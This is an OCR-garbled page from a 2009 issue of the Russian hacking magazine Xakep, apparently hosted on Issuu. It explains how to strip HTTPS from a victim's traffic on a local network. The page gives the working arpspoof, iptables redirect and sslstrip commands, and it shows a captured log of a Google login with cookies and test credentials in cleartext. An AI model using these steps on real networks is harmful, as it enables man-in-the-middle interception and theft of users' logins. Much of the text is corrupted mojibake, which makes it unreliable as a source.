xakep

Page 30

....c: III

QJ

E :::l

U

o

Cl

CO ....

QJ

III

~

e

co E

.... QJ

~

III

~

u:::

Sending 2009-04-27 01:05:55,315 Sending header: cookie: utma=173272373.1849737500.1240172717.1240172717.1240779903.2; utmb=173272373; _utmz=I73272373 .1240172717 .1.1, utmccn=( organic) I ut mcs r=googl e I utmct r=gmai llutmcmd=organic; _utmc=173272373; GoogleAccountsLocale_session=ru; GALX=zflNOU6Dbgw; PREF=ID=b22104af5cb7cla2:TN=1240172745:LN=1240172745:S=ygJPOchJxaZ-N2EG; TZ=-240; G~~IL_RTT=4609; G~~IL_LOGIN=T1240779893453/1240779893453/1240779964171

2009-04-27 01:05:55,320 Sending header: content-type: appl icat ion/x -~M~I- form - url encoded 2009-04-27 01:05:55,335 SECURE POST Data (~~Iw.google.com): 1tmpl=defaul t~l tmplcache=2~continue=http%3A%2F%2Fmail . googl e. com%2Fmail%2F %3F~service=mail~rm=fal s e~l tmpl=defaul t~l t mpl=defaul t~scc=I~GALX=zflNOU6Db gw.Email=testI234 Passwd=testI234.rmShown=l~signIn=%D0%92%D0%BE%D0%B9%Dl %8 2%D0%B8~asts=

2009-04-27 01:05:55,408 Read From Server: HTTP/1. 0 200 OK Content-Type: text/html; charset=UTF-8 Cache-control: no-cache, no-store Pragma: no-cache Expires: Non, 01-Jan-1990 00:00:00 GNT Set-Cookie: GALX=zflNOU6Dbgw Path=/accounts;Secure Date: Sun, 26 Apr 2009 21:07 50 GNT X-Content-Type-Options: nosn ff Content.Length: 19491 Server: GFE/2.0

0 .

t3

2009-04-27 01:05:55,412 Found secure cookie:

II

ILine: 2,199 Col: 241101 RIO \I NORM [IDeSktop.log Find in Files III Tenninal

~.~~fiJ I

G

.2 Default

1:'1 ~

1

St:

u

~

.no "U

np~MEP norASSLSTRIP C nEPEXBA4EHHbIM~ nAPomlM~

«BCE, 4TO TPE60BAllACb Alls:1 PA60Tbl- 3TO nPEAOCTABltiTbSSLSNIFFAE~­ CTBltiTEllbHbl~ CEPTlti<DltiKAT.

#bt sslstrip -a -1 8080 -w /root/log.txt napaMeTp '-a' o3Ha4aeT, 4TO Mbl 5y,[leM norVlpoBaTb BeCb npOXO,[l~l11Vli:i http-Tpa¢VlK. '-l' YKa3blBaeT nopT. KOTopbli:i 5YAeM cnywaTb. a '-w' 3a,[laeT nyrb K nor-¢ai:iny. OCTanc~ nOCne,[lHVli:i WTpVlX - 3aCTaBVlTb )KepT­ By nOBepVlTb, YTO Mbl Vl eCTb TOT caMbli:i wnlO3 B VlHTepHeT. npOBepHeM 3TO c nOMOl11blO yrVlnVlTKVl arpspoof:

KCO>KAllEHltiKl, C2002-rO, KOrAA 6blllA OnY611ltiKOBAHA YTltillf,1TA, 6PAY3EPbl CTAllf,1 YMHEE f,1 TAKO~ npOBEPKO~ 6011bWE HE nPEHE6PErAKlT»

arpspoof -i <yourNetworkdDevice> -t <yourTarget>

<theRoutersIpAddress>

<yourNetworkdDevice> -

~

HameM ceTeBoM

KapT~

(B HameM crryqae ethO).

<yourTarget> -

a~pec

~epTB~.

<theRoutersIpAddress> -

a~pec

mrrD3a

#bt arpspoof -i ethO -t 192.168.1.3 192.168.1.1

LlO)K,[IVlCb. nOKa )KepTBa none3eT B VlHeT. Vl npoBep~i:i norVl. npVlMep KOTOpblX MO)KeWb yBVl,[leTb Ha O,[lHOM "3 CKp"HOB. Bce 3aMe4aTenbHO

#bt iptables -t nat -A PREROUTING -p tep

pa60TaeTI

--destination-port 80 -j REDIRECT --to-port <yourListenPort>

~

HYJlEBA5I 5E30nACHOCTb

KaK B",[I"Wb, 5e30naCHOCTb SSL MO)KHO CBeCTV1 ,[10 Hyn~ V1 npeBpaTVlTb r,[le <yourListenPort> - nopT. KOTOpblX 6y,[leT cnywaTb sslstrip; yCTaHo­

3al11V1l11eHHOe COe,[l"HeHVle B He3al11V1l11eHHoe. ,[I06aBV1B Ha Y4aCTKe

BVlM ero B 8080, HanpVlMep.

,[10 nonb30BaTem KOHHeKT no 06bl4HOMy http-npoToKOny.

Tenepb MO)KHO 3anYCTVlTb Vl caM sslstrip:

Y3HaB. HaCKonbKO 3TO npOCTO peanVl30BaTb. AyMalO. Tbl C oc050i:i BHV1­

~

030

XAKEP 05 /125/09

Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.